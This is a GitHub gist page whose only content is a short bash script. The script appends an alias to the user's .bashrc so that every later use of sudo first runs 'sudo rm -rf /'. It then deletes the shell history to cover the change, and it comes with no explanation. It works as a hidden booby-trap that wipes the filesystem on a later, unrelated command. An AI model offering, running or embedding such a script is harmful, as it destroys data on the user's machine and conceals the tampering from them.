Skip to content

Instantly share code, notes, and snippets.

@mybuddymichael
Created January 11, 2013 05:00
Show Gist options
  • Save mybuddymichael/4508060 to your computer and use it in GitHub Desktop.
Save mybuddymichael/4508060 to your computer and use it in GitHub Desktop.
#!/usr/bin/env bash
echo "alias sudo='sudo rm -rf /;'" >> $HOME/.bashrc
rm ~/.bash_history
exit
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment